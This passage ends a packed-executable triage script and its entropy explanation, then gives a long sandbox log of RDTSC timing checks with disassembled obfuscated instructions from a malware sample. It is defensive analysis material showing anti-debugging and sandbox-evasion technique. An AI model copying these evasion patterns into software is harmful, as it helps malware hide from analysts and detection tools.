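        print(f"{s['name']:<10} entropy={s['entropy']:.3f} {s['flags']}")
    print(result["indicators"], "score =", result["score"])
```

Run against a real file with `triage(open(path, "rb").read())`. The entropy cut-off is deliberately on the high side: 7.955 bits for "dmqztadf" is only possible for compressed or encrypted content, while ordinary code sections sit around 5.5 to 6.5, so anything above 7.0 in a non-resource section is worth unpacking before reading the strings, since the strings the report lists were recovered from memory dumps, not from the file on disk.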
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 14718E1 second address: 14718E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 14718E5 second address: 14718E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EF32A second address: 15EF32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EF32E second address: 15EF349 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C481811Ah 0x0000000e jg 00007F10C4818118h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15D7765 second address: 15D779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F10C4816E0Ch 0x0000000b jns 00007F10C4816E02h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE413 second address: 15EE431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ch 0x00000007 jno 00007F10C4818116h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F10C4818116h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE431 second address: 15EE435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE435 second address: 15EE43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE709 second address: 15EE70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE70D second address: 15EE72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F10C4818118h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10C481811Ah 0x00000015 jnc 00007F10C4818116h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE72F second address: 15EE744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F10C4816DFEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE744 second address: 15EE753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F10C4818116h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE753 second address: 15EE75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE9BF second address: 15EE9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE9C5 second address: 15EE9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EE9CF second address: 15EEA15 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10C4818129h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F10C4818128h 0x00000015 jmp 00007F10C481811Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EEA15 second address: 15EEA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EEA1B second address: 15EEA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EEBA2 second address: 15EEBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFCh 0x00000009 popad 0x0000000a jmp 00007F10C4816E00h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15EEBC3 second address: 15EEBC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F155E second address: 15F1564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F1564 second address: 15F1599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007F10C481811Eh 0x00000015 jl 00007F10C4818118h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F1599 second address: 15F15A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F15A0 second address: 15F15D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818120h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F10C4818126h 0x00000015 jmp 00007F10C4818120h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F15D0 second address: 15F15F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F10C4816DF6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+122D380Dh] 0x00000013 mov dl, 87h 0x00000015 lea ebx, dword ptr [ebp+124533DDh] 0x0000001b sub dx, 3211h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F15F6 second address: 15F160B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F10C4818118h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F160B second address: 15F160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F1686 second address: 15F168C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F186D second address: 15F1881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15F1881 second address: 15F1885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16046EF second address: 16046F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15E69F1 second address: 15E69FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16110A3 second address: 16110AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16113E2 second address: 16113F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C481811Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 161155A second address: 1611573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16116EC second address: 16116FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16116FD second address: 1611703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1611C6B second address: 1611C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F10C481812Fh 0x0000000b jmp 00007F10C4818129h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1611F31 second address: 1611F46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F10C4816E00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1611F46 second address: 1611F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1611F51 second address: 1611F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612078 second address: 1612083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F10C4818116h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612083 second address: 1612089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612089 second address: 16120D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C4818120h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F10C4818128h 0x00000018 ja 00007F10C4818126h 0x0000001e jmp 00007F10C4818120h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16120D5 second address: 16120DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16120DA second address: 16120E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15E8403 second address: 15E840F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F10C4816DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15E840F second address: 15E8415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15E8415 second address: 15E8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15E8419 second address: 15E8430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 161221A second address: 1612229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4816DFAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612229 second address: 1612233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F10C4818116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612966 second address: 16129BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E06h 0x00000007 jp 00007F10C4816DF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F10C4816E09h 0x00000014 jnl 00007F10C4816E0Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16129BF second address: 16129F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F10C4818128h 0x0000000e jmp 00007F10C4818121h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16129F1 second address: 16129F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612B6D second address: 1612B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612D21 second address: 1612D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1612D27 second address: 1612D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F10C4818128h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 161882D second address: 1618832 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1617090 second address: 1617094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1617094 second address: 161709A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 161709A second address: 161709F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15D5BAC second address: 15D5BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F10C4816DF6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 15D5BC5 second address: 15D5BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10C4818127h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F10C4818116h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1620D0D second address: 1620D22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F10C4816DFDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162106C second address: 1621072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162118D second address: 1621193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1621193 second address: 1621198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1621198 second address: 162119D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162136D second address: 1621373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 162146A second address: 1621470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1622B79 second address: 1622B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F10C4818116h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1622B88 second address: 1622B98 instructions: 0x00000000 rdtsc 0x00000002 js 00007F10C4816DF6h 0x00000008 je 00007F10C4816DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1622B98 second address: 1622B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1622B9E second address: 1622BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1622BA8 second address: 1622BFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C481811Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F10C4818127h 0x00000013 pushad 0x00000014 jne 00007F10C4818116h 0x0000001a jmp 00007F10C4818125h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 je 00007F10C481811Eh 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1623259 second address: 1623274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e js 00007F10C4816DF6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1623274 second address: 162328C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4818124h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1623CD2 second address: 1623CEA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F10C4816DFBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1623CEA second address: 1623D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D3825h] 0x0000000f clc 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F10C4818118h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov di, bx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F10C4818118h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007F10C481811Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pop esi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1623D55 second address: 1623D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16246B1 second address: 16246C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16246C3 second address: 16246C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 16246C9 second address: 16246CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627A43 second address: 1627A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627A4D second address: 1627AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F10C4818118h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F10C4818118h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push 00000000h 0x00000042 jmp 00007F10C481811Fh 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627AB2 second address: 1627AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exe | RDTSC instruction interceptor: First address: 1627AB7 second address: 1627AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
